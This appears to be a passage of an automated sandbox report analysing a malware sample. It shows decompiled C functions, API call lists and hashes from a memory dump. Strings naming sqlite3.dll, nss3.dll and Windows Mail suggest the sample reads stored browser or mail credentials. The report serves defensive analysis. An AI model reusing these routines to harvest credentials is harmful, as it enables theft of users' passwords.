0x0040b4e9
0x0040b4eb
0x00000000
0x0040b4eb
0x0040b4cc

APIs

memset.MSVCRT ref: 0040B42E
SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040B472
GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040B48C
PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040B52F

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Message$MenuPostSendStringmemset
String ID:
API String ID: 3798638045-0
Opcode ID: c3aa6ddd336313682f51672c6081f6f8049648b04dcffedc212cd8d1236b5249
Instruction ID: e99ea3cd5ae45d968ce1bb78ba156cefd6297a3afaf0c32d246f8b1269deedf3
Opcode Fuzzy Hash: c3aa6ddd336313682f51672c6081f6f8049648b04dcffedc212cd8d1236b5249
Instruction Fuzzy Hash: 5041F430600611EBCB25DF24CC85A96B7A4FF14324F1482B6E958AB2C6C378DE91CBDC

Uniqueness

Uniqueness Score: -1.00%

Function 0040A119, Relevance: 6.1, APIs: 4, Instructions: 114
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040A119(void* __eax, void* __eflags, char* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				signed int _t63;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int _t79;
				void* _t84;
				signed int _t86;
				char* _t98;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t106;
				void* _t107;

				_t84 = __eax;
				E0040892D(__eax, __eflags);
				_t86 = 0;
				_v12 = 0;
				while(1) {
					_t98 = _a4;
					if( *((intOrPtr*)(_t86 + _t98)) - 0x30 > 9) {
						break;
					}
					_t86 = _t86 + 1;
					if(_t86 < 1) {
						continue;
					}
					if(strlen(_t98) >= 3) {
						break;
					}
					_t79 = atoi(_a4);
					if(_t79 >= 0 && _t79 <  *((intOrPtr*)(_t84 + 0x20))) {
						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t84 + 0x24)) + _t79 * 4) * 0x14 +  *((intOrPtr*)(_t84 + 0x1b4))));
					}
					L21:
					if(_a8 != 0) {
						_v12 = _v12 | 0x00001000;
					}
					_t63 = _v12;
					 *0x41748c =  *0x41748c + 1;
					 *((intOrPtr*)(0x417490 +  *0x41748c * 4)) = _t63;
					return _t63;
				}
				_t104 = 0;
				__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
				_v16 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
					L14:
					_t100 = 0;
					__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
					_v8 = 0;
					if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
						L20:
						goto L21;
					}
					_t106 = 0;
					__eflags = 0;
					do {
						_v20 = E004069D2(0, _a4);
						_t67 = E004069D2(0, _a4);
						__eflags = _v20;
						if(_v20 >= 0) {
							L18:
							_v12 =  *((intOrPtr*)(_t106 +  *((intOrPtr*)(_t84 + 0x1b4))));
							goto L19;
						}
						__eflags = _t67;
						if(_t67 < 0) {
							goto L19;
						}
						goto L18;
						L19:
						_v8 = _v8 + 1;
						_t100 = _t100 + 0x10;
						_t106 = _t106 + 0x14;
						__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
					} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
					goto L20;
				}
				_t102 = 0;
				__eflags = 0;
				do {
					_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x1b4)) + _t104 + 0x10));
					_push(_a4);
					_push(_t72);
					L004115C4();
					_push(_a4);
					_v20 = _t72;
					_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x34)) + _t102 + 0xc));
					_push(_t74);
					L004115C4();
					_t107 = _t107 + 0x10;
					__eflags = _v20;
					if(_v20 == 0) {
						L11:
						_v12 =  *(_t104 +  *((intOrPtr*)(_t84 + 0x1b4)));
						_v16 = 1;
						goto L12;
					}
					__eflags = _t74;
					if(_t74 != 0) {
						goto L12;
					}
					goto L11;
					L12:
					_v8 = _v8 + 1;
					_t102 = _t102 + 0x10;
					_t104 = _t104 + 0x14;
					__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
				} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
				__eflags = _v16;
				if(_v16 != 0) {
					goto L20;
				}
				goto L14;
			}

0x0040a120
0x0040a122
0x0040a127
0x0040a129
0x0040a12c
0x0040a12c
0x0040a136
0x00000000
0x00000000
0x0040a138
0x0040a13c
0x00000000
0x00000000
0x0040a148
0x00000000
0x00000000
0x0040a14d
0x0040a155
0x0040a176
0x0040a176
0x0040a257
0x0040a25c
0x0040a25e
0x0040a25e
0x0040a26b
0x0040a26e
0x0040a274
0x0040a27c
0x0040a27c
0x0040a17f
0x0040a181
0x0040a188
0x0040a18b
0x0040a18e
0x0040a1f2
0x0040a1f2
0x0040a1f4
0x0040a1fa
0x0040a1fd
0x0040a255
0x00000000
0x0040a256
0x0040a1ff
0x0040a1ff
0x0040a201
0x0040a21f
0x0040a224
0x0040a229
0x0040a22f
0x0040a235
0x0040a23e
0x00000000
0x0040a23e
0x0040a231
0x0040a233
0x00000000
0x00000000
0x00000000
0x0040a241
0x0040a241
0x0040a247
0x0040a24a
0x0040a24d
0x0040a24d
0x00000000
0x0040a201
0x0040a190
0x0040a190
0x0040a192
0x0040a198
0x0040a19c
0x0040a19f
0x0040a1a0
0x0040a1a5
0x0040a1a8
0x0040a1ae
0x0040a1b2
0x0040a1b3
0x0040a1b8
0x0040a1bb
0x0040a1bf
0x0040a1c5
0x0040a1ce
0x0040a1d1
0x00000000
0x0040a1d1
0x0040a1c1
0x0040a1c3
0x00000000
0x00000000
0x00000000
0x0040a1d8
0x0040a1d8
0x0040a1de
0x0040a1e1
0x0040a1e4
0x0040a1e4
0x0040a1ec
0x0040a1f0
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 0040892D: ??2@YAPAXI@Z.MSVCRT ref: 0040894E
Part of subcall function 0040892D: ??3@YAXPAX@Z.MSVCRT ref: 00408A15

strlen.MSVCRT ref: 0040A13F
atoi.MSVCRT ref: 0040A14D
_mbsicmp.MSVCRT ref: 0040A1A0
_mbsicmp.MSVCRT ref: 0040A1B3

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _mbsicmp$??2@??3@atoistrlen
String ID:
API String ID: 4107816708-0
Opcode ID: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
Instruction ID: ad5e67b725479cd3c0fe98911646f79d6f4c04cefe3616236e53ea043d5b2769
Opcode Fuzzy Hash: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
Instruction Fuzzy Hash: 24414B75900304AFCB10DFA9C580A9ABBF5FB48308F1084BEEC05AB392D7399A51CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00410E8A, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410E8A(char* __eax, void* __edi) {
				unsigned int _v5;
				signed int _v6;
				signed int _v7;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _t37;
				char* _t56;
				signed char _t57;
				char* _t67;
				void* _t68;
				void* _t69;

				_t68 = __edi;
				_t56 = __eax;
				_t69 = 0;
				_t37 = strlen(__eax) + 0xfffffffd;
				_v16 = _t37;
				if(_t37 < 0) {
					L18:
					 *((char*)(_t69 + _t68)) = 0;
					return _t69;
				}
				_v12 = 0xfffffffe;
				_v12 = _v12 - _t56;
				_t5 = _t56 + 2; // 0x411004
				_t67 = _t5;
				while(1) {
					_t6 = _t67 - 2; // 0x75fff88b
					_t39 =  *_t6;
					if( *_t6 != 0x2e) {
						_v6 = E00410E56(_t39);
					} else {
						_v6 = 0x3e;
					}
					_t9 = _t67 - 1; // 0xfc75fff8
					_t41 =  *_t9;
					if( *_t9 != 0x2e) {
						_v5 = E00410E56(_t41);
					} else {
						_v5 = 0x3e;
					}
					_t43 =  *_t67;
					if( *_t67 != 0x2e) {
						_t57 = E00410E56(_t43);
					} else {
						_t57 = 0x3e;
					}
					_t45 =  *((intOrPtr*)(_t67 + 1));
					if( *((intOrPtr*)(_t67 + 1)) != 0x2e) {
						_v7 = E00410E56(_t45);
					} else {
						_v7 = 0x3e;
					}
					 *(_t68 + _t69) = _v5 >> 0x00000004 | _v6 << 0x00000002;
					if( *_t67 == 0x2d) {
						break;
					}
					 *(_t69 + _t68 + 1) = _t57 >> 0x00000002 | _v5 << 0x00000004;
					if( *((char*)(_t67 + 1)) == 0x2d) {
						 *((char*)(_t69 + _t68 + 2)) = 0;
						_t34 = _t69 + 2; // 0x2
						return _t34;
					}
					_t69 = _t69 + 3;
					 *(_t69 + _t68 - 1) = _t57 << 0x00000006 | _v7;
					_t25 = _t69 + 5; // 0x2
					_t67 = _t67 + 4;
					if(_t25 >= 0x3ff || _v12 + _t67 > _v16) {
						goto L18;
					} else {
						continue;
					}
				}
				 *(_t69 + _t68 + 1) = 0;
				_t31 = _t69 + 1; // 0x1
				return _t31;
			}

0x00410e8a
0x00410e92
0x00410e95
0x00410e9c
0x00410ea0
0x00410ea3
0x00410f5b
0x00410f5b
0x00000000
0x00410f5f
0x00410ea9
0x00410eb0
0x00410eb3
0x00410eb3
0x00410eb6
0x00410eb6
0x00410eb6
0x00410ebb
0x00410ec8
0x00410ebd
0x00410ebd
0x00410ebd
0x00410ecb
0x00410ecb
0x00410ed0
0x00410edd
0x00410ed2
0x00410ed2
0x00410ed2
0x00410ee0
0x00410ee4
0x00410eef
0x00410ee6
0x00410ee6
0x00410ee6
0x00410ef1
0x00410ef6
0x00410f03
0x00410ef8
0x00410ef8
0x00410ef8
0x00410f14
0x00410f1a
0x00000000
0x00000000
0x00410f29
0x00410f31
0x00410f6f
0x00410f74
0x00000000
0x00410f74
0x00410f39
0x00410f3c
0x00410f40
0x00410f43
0x00410f4b
0x00000000
0x00000000
0x00000000
0x00000000
0x00410f4b
0x00410f65
0x00410f6a
0x00000000

APIs

strlen.MSVCRT ref: 00410E97

Strings

>, xrefs: 00410ED2
>, xrefs: 00410EBD
>, xrefs: 00410EF8

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: strlen
String ID: >$>$>
API String ID: 39653677-3911187716
Opcode ID: cc9d2e4949e9ff96ebc93a83fa171427e13732e23a33d014681ceaf85bfc699f
Instruction ID: 69dee6f6c2e5f632f5f5b053a668a00b89048f502478ac4f4f3cd81ce8891ac8
Opcode Fuzzy Hash: cc9d2e4949e9ff96ebc93a83fa171427e13732e23a33d014681ceaf85bfc699f
Instruction Fuzzy Hash: D331D5318097C49ED7218B6980563EFFFA14F26304F188ADAD0E557343D2EC96CAC75A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC6D, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040BC6D(signed int __eax, void* __ecx, void* _a4) {
				unsigned int _t23;
				signed int _t25;
				unsigned int _t34;
				unsigned int _t36;
				void* _t40;
				unsigned int _t45;
				void* _t46;
				int _t47;
				void* _t48;
				void* _t50;

				_t48 = __ecx;
				_t34 = __eax;
				_t23 =  *(__ecx + 0x10);
				_t36 = _t23 + __eax * 8;
				 *(__ecx + 0x10) = _t36;
				if(_t36 < _t23) {
					 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + 1;
				}
				 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t48 + 0x14)) + (_t34 >> 0x1d);
				_t25 = _t23 >> 0x00000003 & 0x0000003f;
				if(_t25 == 0) {
					L6:
					if(_t34 >= 0x40) {
						_t45 = _t34 >> 6;
						do {
							memcpy(_t48 + 0x18, _a4, 0x40);
							_t50 = _t50 + 0xc;
							E0040BD8A(_t48 + 0x18, _t48);
							_a4 = _a4 + 0x40;
							_t34 = _t34 - 0x40;
							_t45 = _t45 - 1;
						} while (_t45 != 0);
					}
					_push(_t34);
					_push(_a4);
					_push(_t48 + 0x18);
				} else {
					_t46 = 0x40;
					_t47 = _t46 - _t25;
					_t40 = _t48 + 0x18 + _t25;
					if(_t34 >= _t47) {
						memcpy(_t40, _a4, _t47);
						_t50 = _t50 + 0xc;
						E0040BD8A(_t48 + 0x18, _t48);
						_a4 = _a4 + _t47;
						_t34 = _t34 - _t47;
						goto L6;
					} else {
						_push(_t34);
						_push(_a4);
						_push(_t40);
					}
				}
				return memcpy();
			}

0x0040bc72
0x0040bc74
0x0040bc76
0x0040bc79
0x0040bc7f
0x0040bc82
0x0040bc84
0x0040bc84
0x0040bc8c
0x0040bc92
0x0040bc95
0x0040bcc7
0x0040bcca
0x0040bcce
0x0040bcd1
0x0040bcda
0x0040bcdf
0x0040bce7
0x0040bcec
0x0040bcf0
0x0040bcf3
0x0040bcf3
0x0040bcd1
0x0040bcf6
0x0040bcf7
0x0040bcfd
0x0040bc97
0x0040bc99
0x0040bc9a
0x0040bc9e
0x0040bca2
0x0040bcb0
0x0040bcb5
0x0040bcbd
0x0040bcc2
0x0040bcc5
0x00000000
0x0040bca4
0x0040bca4
0x0040bca5
0x0040bca8
0x0040bca8
0x0040bca2
0x0040bd0a

APIs

memcpy.MSVCRT ref: 0040BCB0
memcpy.MSVCRT ref: 0040BCDA
memcpy.MSVCRT ref: 0040BCFE

Strings

@, xrefs: 0040BCEC

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memcpy
String ID: @
API String ID: 3510742995-2766056989
Opcode ID: 72109dd3c061e5e7965399845177051784b2c116136a58e32e92d3e3a8f21608
Instruction ID: cecad1072309209c94eeb2778a75b30bbc980c70aaade9bdc77468b7d13379ad
Opcode Fuzzy Hash: 72109dd3c061e5e7965399845177051784b2c116136a58e32e92d3e3a8f21608
Instruction Fuzzy Hash: 8B112BB29003056BDB288F16D8809AA77EAEF50344700063FFD0796291FB39DE55C6DC

Uniqueness

Uniqueness Score: -1.00%

Function 00406F6F, Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00406F6F(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L004115D0();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L004115D6();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}

0x00406f6f
0x00406f70
0x00406f70
0x00406f73
0x00406f77
0x00406f8a
0x00406f8a
0x00406f8e
0x00406f90
0x00406f96
0x00406f97
0x00406f9a
0x00406fa3
0x00406fa4
0x00406fa9
0x00406fb3
0x00406fb5
0x00406fba
0x00406fc1
0x00406fcb
0x00406fcd
0x00406fce
0x00406fd3
0x00406fda
0x00406fe3
0x00406f79
0x00406f79
0x00406f7b
0x00406f7d
0x00406f82
0x00406f83
0x00406f86
0x00406f88
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f88
0x00406ff3
0x00406ff6
0x00406fff
0x00406fff
0x00406fe8
0x00406fec

APIs

??2@YAPAXI@Z.MSVCRT ref: 00406FA4
memset.MSVCRT ref: 00406FB5
memcpy.MSVCRT ref: 00406FC1
??3@YAXPAX@Z.MSVCRT ref: 00406FCE

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ??2@??3@memcpymemset
String ID:
API String ID: 1865533344-0
Opcode ID: 51d873ac656c15b7a7b4c95b09edac65cc2407af7c36c5c472b2660f0814b8dc
Instruction ID: 30667c860212afb2fcb1bf0ba773cc68d22997902d766bb0abd15f5aaececc89
Opcode Fuzzy Hash: 51d873ac656c15b7a7b4c95b09edac65cc2407af7c36c5c472b2660f0814b8dc
Instruction Fuzzy Hash: 81118F71204601AFD328DF1DD881A27F7E6FFD8340B21892EE59B87391DA35E841CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040EFAE, Relevance: 6.1, APIs: 4, Instructions: 53
stringCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040EFAE(char* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				char* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v304;
				char* _t18;
				char* _t22;
				char* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040EF36;
					_v16 = __esi;
					__imp__SHBrowseForFolderA(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v304;
						__imp__SHGetPathFromIDListA(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							strcpy(__esi,  &_v304);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}

0x0040efb8
0x0040efbc
0x0040efbe
0x0040efc6
0x0040efcb
0x0040efd1
0x0040efd5
0x0040efd9
0x0040efdc
0x0040efdf
0x0040efe6
0x0040efed
0x0040eff0
0x0040eff6
0x0040effa
0x0040effc
0x0040f004
0x0040f00c
0x0040f016
0x0040f017
0x0040f01d
0x0040f01e
0x0040f025
0x0040f028
0x0040f02e
0x0040f02e
0x0040f031
0x0040f036

APIs

SHGetMalloc.SHELL32(?), ref: 0040EFBE
SHBrowseForFolderA.SHELL32(?), ref: 0040EFF0
SHGetPathFromIDListA.SHELL32(00000000,?), ref: 0040F004
strcpy.MSVCRT(?,?), ref: 0040F017

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: BrowseFolderFromListMallocPathstrcpy
String ID:
API String ID: 409945605-0
Opcode ID: 363e444f0183eb3209581039a296e9ed2a0e0cb40b9c5b89ec9b93d888cfbacc
Instruction ID: 0bece651b4572a5d25d0fced66708dfb83f65978f11dfbdadd7c1eadd6bf4f14
Opcode Fuzzy Hash: 363e444f0183eb3209581039a296e9ed2a0e0cb40b9c5b89ec9b93d888cfbacc
Instruction Fuzzy Hash: DD11F7B5900208AFCB10DFA9D9889EEBBFCFB49310F10447AEA05E7241D779DA458B64

Uniqueness

Uniqueness Score: -1.00%

Function 0040A437, Relevance: 6.0, APIs: 4, Instructions: 45
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040A437(void* __esi) {
				void* _v260;
				char _v516;
				void* __ebx;
				char* _t16;
				signed short _t25;
				signed short _t27;
				void* _t28;

				_t28 = __esi;
				_push(E00408647( *((intOrPtr*)(__esi + 0x370))));
				_t25 = 4;
				sprintf( &_v260, E004078FF(_t25));
				_t16 = E00408BDE( *((intOrPtr*)(__esi + 0x370)), 0);
				if(_t16 > 0) {
					_push(_t16);
					_t27 = 5;
					sprintf( &_v516, E004078FF(_t27));
					_t16 = strcat( &_v260,  &_v516);
				}
				if( *((intOrPtr*)(_t28 + 0x108)) != 0) {
					return SendMessageA( *(_t28 + 0x114), 0x401, 0,  &_v260);
				}
				return _t16;
			}

0x0040a437
0x0040a44c
0x0040a44f
0x0040a45d
0x0040a46d
0x0040a474
0x0040a476
0x0040a479
0x0040a487
0x0040a49a
0x0040a49f
0x0040a4aa
0x00000000
0x0040a4c0
0x0040a4c7

APIs

Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07

sprintf.MSVCRT ref: 0040A45D
SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A4C0

Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,74E04DE0), ref: 0040797A
Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998

sprintf.MSVCRT ref: 0040A487
strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: sprintf$LoadMessageSendStringmemcpystrcatstrcpystrlen
String ID:
API String ID: 919693953-0
Opcode ID: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
Instruction ID: 75288aada6eb4f7a447a9cf13bdf828529425e42ebb21a5188d22772f738aad9
Opcode Fuzzy Hash: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
Instruction Fuzzy Hash: 2601DBB250030466D721B775DD86FEB73AC6F00304F40447BB74AF6082DABCE9808B29

Uniqueness

Uniqueness Score: -1.00%

Function 0040F3BA, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040F3BA(char* _a4) {
				void _v267;
				char _v268;
				int _t12;
				signed int _t16;

				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t12 = strlen(_a4);
				_t5 = strlen("sqlite3.dll") + 1; // 0x1
				if(_t12 + _t5 >= 0x104) {
					_v268 = 0;
				} else {
					E004062AD( &_v268, _a4, "sqlite3.dll");
				}
				_t16 = E0040614B( &_v268);
				asm("sbb eax, eax");
				return  ~( ~_t16);
			}

0x0040f3d5
0x0040f3dc
0x0040f3e4
0x0040f3f6
0x0040f3ff
0x0040f414
0x0040f401
0x0040f40b
0x0040f411
0x0040f422
0x0040f42b
0x0040f432

APIs

memset.MSVCRT ref: 0040F3DC
strlen.MSVCRT ref: 0040F3E4
strlen.MSVCRT ref: 0040F3F1

Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4

Strings

sqlite3.dll, xrefs: 0040F3E9, 0040F3EE, 0040F401

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: strlen$memsetstrcatstrcpy
String ID: sqlite3.dll
API String ID: 1581230619-1155512374
Opcode ID: 3cb808dc3fd31d135458d717301fbb3bbf110c950f4aa8e177593d82486e3e62
Instruction ID: fec7c4afce47c381fe657df57b8ff367c384fd882de8837a2d08c6e6e293e1f2
Opcode Fuzzy Hash: 3cb808dc3fd31d135458d717301fbb3bbf110c950f4aa8e177593d82486e3e62
Instruction Fuzzy Hash: 4BF02D3144C1286ADB10E769DC45FCA7BAC8FA1318F1040B7F586E60D2D9B89AC98668

Uniqueness

Uniqueness Score: -1.00%

Function 004098F4, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004098F4(intOrPtr* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void* __esi;
				void* _t15;
				intOrPtr* _t24;
				char* _t26;

				_t24 = __ecx;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				_t15 =  *((intOrPtr*)( *_t24 + 0x20))();
				_t26 =  &_v260;
				E00409018(_t26, _t15);
				sprintf( &_v516, "</%s>\r\n", _t26);
				return E00405EFD(_a4,  &_v516);
			}

0x0040990e
0x00409910
0x00409917
0x00409926
0x0040992d
0x00409939
0x0040993d
0x00409943
0x00409957
0x00409971

APIs

memset.MSVCRT ref: 00409917
memset.MSVCRT ref: 0040992D

Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060

sprintf.MSVCRT ref: 00409957

Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,Mt,00000000,?,?,004092ED,00000001,00412B1C,74E04DE0), ref: 00405F17

Strings

</%s>, xrefs: 00409951

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
String ID: </%s>
API String ID: 3202206310-259020660
Opcode ID: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
Instruction ID: adbfc7571eef3522ba50f6b4148bdf50dea618c8f0168b60c77ad4ff43fabaf4
Opcode Fuzzy Hash: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
Instruction Fuzzy Hash: B201D1729001297AD720A719CC45FDA7AACAF84304F0400FAB60AF3182DA749F848BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406734, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 20
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406734(char* __edi, char* _a4) {
				char* _t12;
				int _t13;

				_t12 = __edi;
				_t13 = strlen(__edi);
				if(strlen(_a4) + _t13 < 0x104) {
					_t2 =  &_a4; // 0x410d64
					strcat(_t13 + __edi,  *_t2);
				}
				return _t12;
			}

0x00406734
0x0040673f
0x0040674f
0x00406751
0x00406758
0x0040675e
0x00406762

APIs

strlen.MSVCRT ref: 00406736
strlen.MSVCRT ref: 00406741
strcat.MSVCRT(00000000,dA,0000001C,00410D64,\Microsoft\Windows Mail,?,?,?), ref: 00406758

Strings

dA, xrefs: 00406751

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: strlen$strcat
String ID: dA
API String ID: 2335785903-82490789
Opcode ID: 8b0d949a9835eed74c78f3475c18959fb5a6152aa5369579c15a011cca720fff
Instruction ID: 8adb96eafe51badce5d1f431fd236154b3227263db9247bb640c15329514921a
Opcode Fuzzy Hash: 8b0d949a9835eed74c78f3475c18959fb5a6152aa5369579c15a011cca720fff
Instruction Fuzzy Hash: EFD05E3350852036C5152316BC429DE5B82CBC037CB15445FF609921A1E93D84D1859D

Uniqueness

Uniqueness Score: -1.00%

Function 00402221, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00402221(void* __ecx, intOrPtr _a4, char* _a8) {
				void* __ebx;
				intOrPtr _t22;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t32;
				void* _t36;
				signed short _t42;
				char* _t47;
				void* _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				void* _t57;

				_t22 = _a4;
				_t57 = _t22 - 6;
				_t47 = _a8;
				_t48 = __ecx;
				 *_t47 = 0;
				if(_t57 > 0) {
					_t23 = _t22 - 7;
					if(_t23 == 0) {
						return __ecx + 0x214;
					}
					_t25 = _t23 - 1;
					if(_t25 == 0) {
						return __ecx + 0x294;
					}
					_t27 = _t25 - 1;
